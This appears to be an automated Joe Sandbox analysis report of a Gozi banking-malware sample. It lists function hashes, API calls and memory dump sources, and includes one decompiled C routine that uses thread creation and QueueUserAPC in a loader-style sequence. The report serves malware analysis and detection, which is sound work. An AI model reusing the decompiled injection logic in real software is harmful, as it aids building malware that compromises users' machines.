Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c20000_gozi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fc12f81fc0855c5c0cfe4f31f4286be7991695e44863748e7d692a02eab0b6c
Instruction ID: d7547afe45331e4ad5abb8bf0639fba251e0932d08007b262075a47cbb01d0bd
Opcode Fuzzy Hash: 7fc12f81fc0855c5c0cfe4f31f4286be7991695e44863748e7d692a02eab0b6c
Instruction Fuzzy Hash: 90D1CCB07027219FEB19EB75C490BAE77F6AF89200F14886DD146CB690DF35DA02DB51

Uniqueness

Uniqueness Score: -1.00%

Function 03045364, Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 03045421

Memory Dump Source

Source File: 00000002.00000002.327808436.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3040000_gozi.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 85b2598c41de2362d3a611aac99f36e6791a6a142d8aabaebc1c4e2a7d57db0b
Instruction ID: 831cf2b21831bc76069565716825d58ce044a031f87b7695dea185cb2a823a35
Opcode Fuzzy Hash: 85b2598c41de2362d3a611aac99f36e6791a6a142d8aabaebc1c4e2a7d57db0b
Instruction Fuzzy Hash: 9C5113B1C00618CFDB20CFAAD8847DEBBF5BF89318F24846AD418AB251D7756945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0304DDCC, Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0304FE0A

Memory Dump Source

Source File: 00000002.00000002.327808436.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3040000_gozi.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 50e0b580cc1cc842bfe659c754dd6be57022487db05a4e22d0acbead491aa361
Instruction ID: 6a062c7f123575f9c320307ae744d0c11296901243196f24be70e38764f0e5b5
Opcode Fuzzy Hash: 50e0b580cc1cc842bfe659c754dd6be57022487db05a4e22d0acbead491aa361
Instruction Fuzzy Hash: 1C51BDB1D01309AFDB14CFAAC984ADEFBB5BF48314F24852AE819AB210D7749945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0304FCEC, Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0304FE0A

Memory Dump Source

Source File: 00000002.00000002.327808436.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3040000_gozi.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: cfcba28eea8d7150fe6391bed67bdf05765980b0606178f0edcb0b9bb49b22a8
Instruction ID: 87ce98febf47c5dbee6e8cbdbaf40626df94229fc10b205f0d548ed3e2b01cf3
Opcode Fuzzy Hash: cfcba28eea8d7150fe6391bed67bdf05765980b0606178f0edcb0b9bb49b22a8
Instruction Fuzzy Hash: F751CFB1D00309DFDB14CFAAC984ADEFBB6BF48314F24862AE419AB210D7749945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 03043DE8, Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 03045421

Memory Dump Source

Source File: 00000002.00000002.327808436.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3040000_gozi.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ada8709e6089e89cb20606d358fad14aa55670b5c3764854812fdfc76e44791b
Instruction ID: 4f85b0609dc670ff8f8afbbc262c96d3849e66bd189c0bb74855b2fc5fd6c0c2
Opcode Fuzzy Hash: ada8709e6089e89cb20606d358fad14aa55670b5c3764854812fdfc76e44791b
Instruction Fuzzy Hash: 2541F4B1C0061CCBDB24CFAAD884BDEBBB5BF89308F64856AD408AB251D7756945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0304B97A, Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0304B87E,?,?,?,?,?), ref: 0304B93F

Memory Dump Source

Source File: 00000002.00000002.327808436.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3040000_gozi.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ea84eef94654d096d9dfd31b3d8513af7d03a1eea697115b3f14a6cecd1d23e0
Instruction ID: 8beb907d6cd48003283af7f46af4d3258db8f0ce7b97d9b9a267bac0617fbe2b
Opcode Fuzzy Hash: ea84eef94654d096d9dfd31b3d8513af7d03a1eea697115b3f14a6cecd1d23e0
Instruction Fuzzy Hash: 063179B8A80308AFE700DF65E94DB6ABBB5F788304F144429E9829B385DF794D40CF11

Uniqueness

Uniqueness Score: -1.00%

Function 03049800, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0304B87E,?,?,?,?,?), ref: 0304B93F

Memory Dump Source

Source File: 00000002.00000002.327808436.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3040000_gozi.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5458d8146c220269a6b1071aa25650d5a85a27035654110baa4f566a7303191c
Instruction ID: d63aca7ab409be65a749df1fdf46404fd90ea10cfbca4836b428106b3c794e6c
Opcode Fuzzy Hash: 5458d8146c220269a6b1071aa25650d5a85a27035654110baa4f566a7303191c
Instruction Fuzzy Hash: 8621E7B5901208AFDB10CF99D584ADEFBF8EB48320F14842AE955A3310D374A954CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0304B8B2, Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0304B87E,?,?,?,?,?), ref: 0304B93F

Memory Dump Source

Source File: 00000002.00000002.327808436.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3040000_gozi.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 34488b76e488b2f85e607d1f7ffee8ff77ef8d5134e8a155de921b021fc9b181
Instruction ID: d38ec54cc7634d29272a194abeb3d5f4ac886b7704b813f67aa455120c817374
Opcode Fuzzy Hash: 34488b76e488b2f85e607d1f7ffee8ff77ef8d5134e8a155de921b021fc9b181
Instruction Fuzzy Hash: D921E5B5900219AFDB10CF99D984ADEFBF8EB48324F14841AE954A3310D374A954CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 07C29700, Relevance: 1.6, APIs: 1, Instructions: 59
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumThreadWindows.USER32(?,00000000,?), ref: 07C29771

Memory Dump Source

Source File: 00000002.00000002.329375842.0000000007C20000.00000040.00000001.sdmp, Offset: 07C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c20000_gozi.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: 8c920d4c6ed493c8263df06701e462ea6ae550e26300106babf5d47c0b4bbab5
Instruction ID: 3bfb00cfd039811be7af6e9f8d38904a5a5725899d53de81fff3d022f0b40ba5
Opcode Fuzzy Hash: 8c920d4c6ed493c8263df06701e462ea6ae550e26300106babf5d47c0b4bbab5
Instruction Fuzzy Hash: 8A2127B19002199FDB10CF9AC884BEEFBF5FF88320F14842AD455A3250D778A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 03049478, Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,03049951,00000800,00000000,00000000), ref: 03049B62

Memory Dump Source

Source File: 00000002.00000002.327808436.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3040000_gozi.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 58dc0e955fba49cdd55813e36f4a726269f430966658b067914ef3663d79878c
Instruction ID: c0a82f10d919ed9ea8025b36905e9b40ac85037771f6c8934c475f71aabdb7c2
Opcode Fuzzy Hash: 58dc0e955fba49cdd55813e36f4a726269f430966658b067914ef3663d79878c
Instruction Fuzzy Hash: BB11E7B59002099FCB10CF9AD584ADFFBF4EB58324F14852AD556A7200C375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 03049AF0, Relevance: 1.6, APIs: 1, Instructions: 54
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,03049951,00000800,00000000,00000000), ref: 03049B62

Memory Dump Source

Source File: 00000002.00000002.327808436.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3040000_gozi.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: cd8b4475e382d381851eb076622fc139a93d1614659478a7c410e1afbab038fd
Instruction ID: 9185d62330309d6d27757d14b6255ac31293a308a9bb832377a5fa090d23589e
Opcode Fuzzy Hash: cd8b4475e382d381851eb076622fc139a93d1614659478a7c410e1afbab038fd
Instruction Fuzzy Hash: 7311F6B6D002099FDB10CF9AD984BDFFBF8EB48324F14852AD455A7200C375A645CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0304986A, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 030498D6

Memory Dump Source

Source File: 00000002.00000002.327808436.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3040000_gozi.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 189c7d0620185d98381b8a350d30a6215878f3657135fdc0dae3414b0b5bafd5
Instruction ID: 8acc9a54d2f302eb5b75623d848177e01cbfe446a0d2914f6378e741acf9673e
Opcode Fuzzy Hash: 189c7d0620185d98381b8a350d30a6215878f3657135fdc0dae3414b0b5bafd5
Instruction Fuzzy Hash: 7511F0B5C006099BCB10CF9AD444BDEFBF8EB48324F14852AD819A7200C375A645CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 03049870, Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 030498D6

Memory Dump Source

Source File: 00000002.00000002.327808436.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3040000_gozi.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6dc35acfd62a5056539d3cab26e91b584ef574af317ce556fe99d33f3e33df24
Instruction ID: e8902ad51dfc63559c1542364438ff9c81a82ad4100996673567bd96f4c12f93
Opcode Fuzzy Hash: 6dc35acfd62a5056539d3cab26e91b584ef574af317ce556fe99d33f3e33df24
Instruction Fuzzy Hash: E0110FB5C002098FCB10CF9AD444ADEFBF8EF88324F14852AD819A7200C378A645CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0304DE04, Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0304FF28,?,?,?,?), ref: 0304FF9D

Memory Dump Source

Source File: 00000002.00000002.327808436.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3040000_gozi.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: b83933cea046b8458c5163780976f2e4095827b0a1b69997946f3847a54b5cb8
Instruction ID: 164664ab42bf2e6943a9e85b289f349b7347b33f34d0d2382ae2a9ad911fae13
Opcode Fuzzy Hash: b83933cea046b8458c5163780976f2e4095827b0a1b69997946f3847a54b5cb8
Instruction Fuzzy Hash: 2111F5B58003099FDB10CF9AD589BDEFBF8EB49324F14851AE955A7240C374AA44CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07C20084, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 07C2081D

Memory Dump Source

Source File: 00000002.00000002.329375842.0000000007C20000.00000040.00000001.sdmp, Offset: 07C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c20000_gozi.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 3db10c7a6eb44830fcc5d297184a04417ecaedaf311493ebc50cb7e144654516
Instruction ID: 9fe95eb3949a701f5aa6aa90c0429a07b96e8031789910b24f6e38a858ea545c
Opcode Fuzzy Hash: 3db10c7a6eb44830fcc5d297184a04417ecaedaf311493ebc50cb7e144654516
Instruction Fuzzy Hash: 051103B59003189FCB10DF9AD488BDEFBF8EB48324F14842AD559A7600C374A985CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07C25448, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,07C26357), ref: 07C26DFD

Memory Dump Source

Source File: 00000002.00000002.329375842.0000000007C20000.00000040.00000001.sdmp, Offset: 07C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c20000_gozi.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 76ff0243670a65378fd5f535b773460f092b1eaa4d3e4a0d286e29a1e1184002
Instruction ID: 82ba9a125fe691c745f4173e96e297d6629ca12fc6873ec9a54db6fd3d5f3133
Opcode Fuzzy Hash: 76ff0243670a65378fd5f535b773460f092b1eaa4d3e4a0d286e29a1e1184002
Instruction Fuzzy Hash: 9711F2B5C046599FCB20CF9AD484BDEFBF4EB48324F14856AE819B3600D378A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0304FF39, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0304FF28,?,?,?,?), ref: 0304FF9D

Memory Dump Source

Source File: 00000002.00000002.327808436.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3040000_gozi.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: ae1acebabfda64ffe156e6ad93a7d1545c4ae9a6e30a083a235f7babbb6f6c9e
Instruction ID: d7af1a9cce6f3b9b12d7a5e2d0eca29ad7e32910014bd0620d41800fa50753e0
Opcode Fuzzy Hash: ae1acebabfda64ffe156e6ad93a7d1545c4ae9a6e30a083a235f7babbb6f6c9e
Instruction Fuzzy Hash: 5E1103B5800209DFDB10CF99D589BDEFBF8EF49324F24881AD955A3641C378AA44CFA5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0304E570, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.327808436.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3040000_gozi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c60b02ee196eb89252e84921f4c15aca19d6d37f0f9569ac30d20a5f710c4f78
Instruction ID: c1dfa1dbd51178aef8d03d48048a1d5e5f32e18872cf5c165151f164cf1dbd5b
Opcode Fuzzy Hash: c60b02ee196eb89252e84921f4c15aca19d6d37f0f9569ac30d20a5f710c4f78
Instruction Fuzzy Hash: 2A12A2F1C13746AAE310EF65ED981C93BB1F746328F904228D2657AAD9D7BC114ACF84

Uniqueness

Uniqueness Score: -1.00%

Function 0304C124, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.327808436.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3040000_gozi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a11a6a5632df4431f6d2194d87bf478e42c03f420e427213ac0033765736515b
Instruction ID: ecbd7bde34a4532e6e53d44c4d287638816ffe539a55755b77e1840c52ad51b2
Opcode Fuzzy Hash: a11a6a5632df4431f6d2194d87bf478e42c03f420e427213ac0033765736515b
Instruction Fuzzy Hash: 0BA15B76E0121A9FCF05DFA5C8445DEBBF6FF85300B1585BAE805AB261EB71EA05CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0304E56A, Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.327808436.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3040000_gozi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e079dec6d7074c43ee0b2e1c8fad81bbfa16b002f10b2225f8438480f2ee1c7f
Instruction ID: 5f6b0a184ac4da5f6237f1c90c43701259294d3f5d51c604218d9f0028891c8e
Opcode Fuzzy Hash: e079dec6d7074c43ee0b2e1c8fad81bbfa16b002f10b2225f8438480f2ee1c7f
Instruction Fuzzy Hash: 92C109B1C1274A9AE710EF65EC881C97BB1FB86328F514328D2617B6D8D7BC144ACF54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 5696 Parent PID: 6992 RegAsm.exeCOMMON

Executed Functions

Function 03F21AE3, Relevance: 39.3, APIs: 26, Instructions: 336
memorylibrarynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlInitializeCriticalSection.NTDLL(03F2C328), ref: 03F21B01

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

memset.NTDLL ref: 03F21B32
RtlInitializeCriticalSection.NTDLL(043AB148), ref: 03F21B43

Part of subcall function 03F1C92D: RtlInitializeCriticalSection.NTDLL(03F2C300), ref: 03F1C951
Part of subcall function 03F1C92D: RtlInitializeCriticalSection.NTDLL(03F2C2E0), ref: 03F1C967
Part of subcall function 03F1C92D: GetVersion.KERNEL32(?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F1C978
Part of subcall function 03F1C92D: GetModuleHandleA.KERNEL32(0000170B,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F1C9AC

Part of subcall function 03F2255F: RtlAllocateHeap.NTDLL(00000000,-00000003,77639EB0), ref: 03F22579

CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F21B6C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F21B7D
CloseHandle.KERNEL32(00000520,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F21B91
GetUserNameA.ADVAPI32(00000000,?), ref: 03F21BDA
RtlAllocateHeap.NTDLL(00000000,?), ref: 03F21BED
GetUserNameA.ADVAPI32(00000000,?), ref: 03F21C02
NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 03F21C32
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F21C47
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F21C51
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F21C5E
GetShellWindow.USER32 ref: 03F21C79
GetWindowThreadProcessId.USER32(00000000), ref: 03F21C80
memcpy.NTDLL(03F2C1E4,?,00000018,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F21CBC
CreateEventA.KERNEL32(03F2C1A8,00000001,00000000,00000000,?,00000001,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F21D3F
RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 03F21D69
OpenEventA.KERNEL32(00100000,00000000,043AA9E0,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F21D91
CreateEventA.KERNEL32(03F2C1A8,00000001,00000000,043AA9E0,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F21DA4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F21DAA
GetLastError.KERNEL32(03F111B1,03F2C0FC,03F2C100,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F21E30
LoadLibraryA.KERNEL32(?,03F111B1,03F2C0FC,03F2C100,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F21E4B
SetEvent.KERNEL32(?,03F226D2,00000000,00000000,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F21EE0
RtlAllocateHeap.NTDLL(00000000,00000052,03F226D2), ref: 03F21EF5
wsprintfA.USER32 ref: 03F21F25

Part of subcall function 03F038FA: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,03F21EC1,03F226D2,00000000,00000000), ref: 03F03970

Part of subcall function 03F235FC: HeapFree.KERNEL32(00000000,00000000,00000000,1D4E36C0,?,00000000,?,?,?,00000000,03F21EC6,03F226D2,00000000,00000000), ref: 03F2366D

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$Allocate$CriticalErrorEventInitializeLastSection$CreateHandleProcess$CloseFreeNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
String ID:
API String ID: 2659885799-0
Opcode ID: fb9737660666b00c506ab2e8452736a966e803b6a1d8b286fda977a147ce0820
Instruction ID: 45d40f49789a802a951840c53f67e76f2ffce1163d994588a884bb9ad0ba3b12
Opcode Fuzzy Hash: fb9737660666b00c506ab2e8452736a966e803b6a1d8b286fda977a147ce0820
Instruction Fuzzy Hash: DFC1DD74A0032ADFC730EF65ECA592EBFA8FB54700B14092EF526C7255DB70A844CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040140F, Relevance: 22.6, APIs: 15, Instructions: 146
threadsleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E0040140F() {
				void* _v32;
				long _v36;
				long _v40;
				long _v44;
				signed int _v52;
				void* __edi;
				long _t25;
				long _t27;
				long _t28;
				void* _t31;
				long _t34;
				long _t35;
				void* _t42;
				intOrPtr _t44;
				signed int _t48;
				signed int _t49;
				long _t55;
				long _t56;
				intOrPtr _t57;
				signed int _t58;
				void* _t63;
				void* _t66;
				signed int _t69;
				signed int _t70;
				void* _t73;
				intOrPtr* _t74;

				_t25 = E004017A0();
				_v36 = _t25;
				if(_t25 != 0) {
					L27:
					return _t25;
				} else {
					goto L1;
				}
				do {
					L1:
					_t69 = 0;
					_v32 = 0;
					_t55 = 0x30;
					do {
						_t63 = E00401F96(_t55);
						if(_t63 == 0) {
							_v36 = 8;
						} else {
							_t48 = NtQuerySystemInformation(8, _t63, _t55,  &_v32); // executed
							_t58 = _t48;
							_t49 = _t48 & 0x0000ffff;
							_v52 = _t49;
							if(_t49 == 4) {
								_t55 = _t55 + 0x30;
							}
							_t70 = 0x13;
							_t10 = _t58 + 1; // 0x1
							_t69 =  *_t63 % _t70 + _t10;
							E00401BB2(_t63);
						}
					} while (_v36 != 0);
					_t27 = E00401000(_t63, _t69); // executed
					_v40 = _t27;
					Sleep(_t69 << 4); // executed
					_t25 = _v40;
				} while (_t25 == 9);
				if(_t25 != 0) {
					goto L27;
				}
				_t28 = E00401BC7(_t58); // executed
				_v36 = _t28;
				if(_t28 != 0) {
					L25:
					_t25 = _v36;
					if(_t25 == 0xffffffff) {
						_t25 = GetLastError();
					}
					goto L27;
				}
				if(E00401FB8(_t58,  &_v32) != 0) {
					 *0x404178 = 0;
					L17:
					_t31 = CreateThread(0, 0, __imp__SleepEx,  *0x404180, 0, 0); // executed
					_t73 = _t31;
					if(_t73 == 0) {
						L24:
						_v40 = GetLastError();
						goto L25;
					}
					_t34 = QueueUserAPC(E00401143, _t73,  &_v32); // executed
					if(_t34 == 0) {
						_t56 = GetLastError();
						TerminateThread(_t73, _t56);
						CloseHandle(_t73);
						_t73 = 0;
						SetLastError(_t56);
					}
					if(_t73 == 0) {
						goto L24;
					} else {
						_t35 = WaitForSingleObject(_t73, 0xffffffff);
						_v44 = _t35;
						if(_t35 == 0) {
							GetExitCodeThread(_t73,  &_v44); // executed
						}
						CloseHandle(_t73);
						goto L25;
					}
				}
				_t57 = _v32;
				_t74 = __imp__GetLongPathNameW;
				_t42 =  *_t74(_t57, 0, 0); // executed
				_t66 = _t42;
				if(_t66 == 0) {
					L15:
					 *0x404178 = _t57;
					goto L17;
				}
				_t19 = _t66 + 2; // 0x2
				_t44 = E00401F96(_t66 + _t19);
				 *0x404178 = _t44;
				if(_t44 == 0) {
					goto L15;
				}
				 *_t74(_t57, _t44, _t66); // executed
				E00401BB2(_t57);
				goto L17;
			}

0x0040141b
0x00401422
0x00401426
0x004015a4
0x004015aa
0x00000000
0x00000000
0x00000000
0x0040142c
0x0040142c
0x0040142c
0x00401430
0x00401434
0x00401435
0x0040143b
0x0040143f
0x00401478
0x00401441
0x0040144a
0x00401450
0x00401452
0x0040145a
0x0040145e
0x00401460
0x00401460
0x00401467
0x0040146d
0x0040146d
0x00401471
0x00401471
0x00401480
0x00401488
0x00401491
0x00401495
0x0040149b
0x0040149f
0x004014a8
0x00000000
0x00000000
0x004014ae
0x004014b5
0x004014b9
0x00401595
0x00401595
0x0040159c
0x0040159e
0x0040159e
0x00000000
0x0040159c
0x004014cb
0x0040150a
0x00401510
0x00401522
0x00401528
0x0040152c
0x0040158b
0x00401591
0x00000000
0x00401591
0x00401539
0x00401547
0x0040154f
0x00401553
0x0040155a
0x0040155d
0x0040155f
0x0040155f
0x00401567
0x00000000
0x00401569
0x0040156c
0x00401574
0x00401578
0x00401580
0x00401580
0x00401587
0x00000000
0x00401587
0x00401567
0x004014cd
0x004014d3
0x004014da
0x004014dc
0x004014e0
0x00401502
0x00401502
0x00000000
0x00401502
0x004014e2
0x004014e7
0x004014ee
0x004014f3
0x00000000
0x00000000
0x004014f8
0x004014fb
0x00000000

APIs

Part of subcall function 004017A0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401420,?,00000000), ref: 004017AF
Part of subcall function 004017A0: GetVersion.KERNEL32(?,00000000), ref: 004017BE
Part of subcall function 004017A0: GetCurrentProcessId.KERNEL32(?,00000000), ref: 004017CD
Part of subcall function 004017A0: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000000), ref: 004017E6

Part of subcall function 00401F96: HeapAlloc.KERNEL32(00000000,?,0040143B,00000030,?,00000000), ref: 00401FA2

NtQuerySystemInformation.NTDLL ref: 0040144A
Sleep.KERNELBASE(00000000,00000000), ref: 00401495
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 004014DA
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 004014F8
CreateThread.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00401522
QueueUserAPC.KERNELBASE(00401143,00000000,?), ref: 00401539
GetLastError.KERNEL32 ref: 00401549
TerminateThread.KERNEL32(00000000,00000000), ref: 00401553
CloseHandle.KERNEL32(00000000), ref: 0040155A
SetLastError.KERNEL32(00000000), ref: 0040155F
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040156C
GetExitCodeThread.KERNELBASE(00000000,00000000), ref: 00401580
CloseHandle.KERNEL32(00000000), ref: 00401587
GetLastError.KERNEL32 ref: 0040158B
GetLastError.KERNEL32 ref: 0040159E

Memory Dump Source

Source File: 00000008.00000002.521792829.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.521817363.0000000000405000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.521835908.0000000000407000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$Thread$CloseCreateHandleLongNamePathProcess$AllocCodeCurrentEventExitHeapInformationObjectOpenQueryQueueSingleSleepSystemTerminateUserVersionWait
String ID:
API String ID: 2806485730-0
